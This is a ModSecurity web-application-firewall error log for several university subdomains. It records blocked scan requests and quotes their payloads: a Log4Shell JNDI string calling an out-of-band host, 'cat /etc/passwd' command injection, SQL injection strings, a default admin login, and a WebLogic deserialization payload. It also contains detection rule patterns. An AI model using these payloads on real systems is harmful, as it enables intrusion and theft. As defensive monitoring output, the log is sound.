[Tue Aug 29 11:34:20.973339 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11TMCo-f0AAAPDoOcAAAAP"]
[Tue Aug 29 11:34:21.246945 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.1.135.185_35468770ed4f68abe5004e7b75f46e689736368e"): Internal error [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11TMCo-f0AAAPLwIQAAAAX"]
[Tue Aug 29 11:34:21.257238 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgwx7h875rhxjyj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO11TcCo-f0AAAPLwIUAAAAX"]
[Tue Aug 29 11:34:21.426400 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "185.223.160.11_1759fce451e56b4eb624eea72c06ca78e73f27d0"): Internal error [hostname "informatika.unla.ac.id"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ZO11TcCo-f0AAATMStAAAAAB"]
[Tue Aug 29 11:34:21.602888 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "69.171.249.118_b1b8a850aec98eb3184fe6a227dee75dd09e304a"): Internal error [hostname "pusatbahasa.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11TcCo-f0AAAQKOucAAAAs"]
[Tue Aug 29 11:34:21.834646 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.194_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO11TcCo-f0AAAPLwIUAAAAX"]
[Tue Aug 29 11:34:21.834726 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.16.80.17_06c6936bd2e49babc5d8cff65b916d05fe9bff95"): Internal error [hostname "unla.ac.id"] [uri "/objects/psqfy.txt"] [unique_id "ZO11TcCo-f0AAASVoI8AAAAe"]
[Tue Aug 29 11:34:22.145123 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAASEJWIAAAAE"]
[Tue Aug 29 11:34:22.161671 2023] [:error] [pid 1229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAATNJYQAAAAF"]
[Tue Aug 29 11:34:22.165677 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAASEJWMAAAAE"]
[Tue Aug 29 11:34:23.248952 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASGMvkAAAAA"]
[Tue Aug 29 11:34:23.618153 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASPDL4AAAAS"]
[Tue Aug 29 11:34:23.720546 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASS8AkAAAAY"]
[Tue Aug 29 11:34:23.901344 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASGMwAAAAAA"]
[Tue Aug 29 11:34:23.939730 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASGMwIAAAAA"]
[Tue Aug 29 11:34:24.184983 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UMCo-f0AAATVtQsAAAAZ"]
[Tue Aug 29 11:34:24.185691 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UMCo-f0AAATWYP8AAAAa"]
[Tue Aug 29 11:34:25.199620 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UcCo-f0AAATge50AAAAl"]
[Tue Aug 29 11:34:25.372555 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Rule 7fe1c6d9b840 [id "973347"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATXLJkAAAAb"]
[Tue Aug 29 11:34:25.383089 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Rule 7fe1c6d9b840 [id "973347"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGMAAAAx"]
[Tue Aug 29 11:34:25.499206 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: , \\x22method\\x22:  found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22 [hostname "ft.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGYAAAAx"]
[Tue Aug 29 11:34:25.575519 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "pusatbahasa.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAAT2JPIAAAAz"]
[Tue Aug 29 11:34:25.612775 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "journal.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATuszgAAAAv"]
[Tue Aug 29 11:34:25.640030 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Rule 7fe1c6d9b840 [id "973347"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGwAAAAx"]
[Tue Aug 29 11:34:26.108943 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATqf6kAAAAu"]
[Tue Aug 29 11:34:26.144840 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UsCo-f0AAATxvWwAAAAw"]
[Tue Aug 29 11:34:26.205054 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATxvW8AAAAw"]
[Tue Aug 29 11:34:26.232246 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAT9PNkAAAA1"]
[Tue Aug 29 11:34:26.233796 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAT@KtsAAAA2"]
[Tue Aug 29 11:34:26.244246 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAUFdd0AAAA9"]
[Tue Aug 29 11:34:26.263188 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAULx6oAAABD"]
[Tue Aug 29 11:34:26.335447 2023] [:error] [pid 1301] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUVDNIAAABL"]
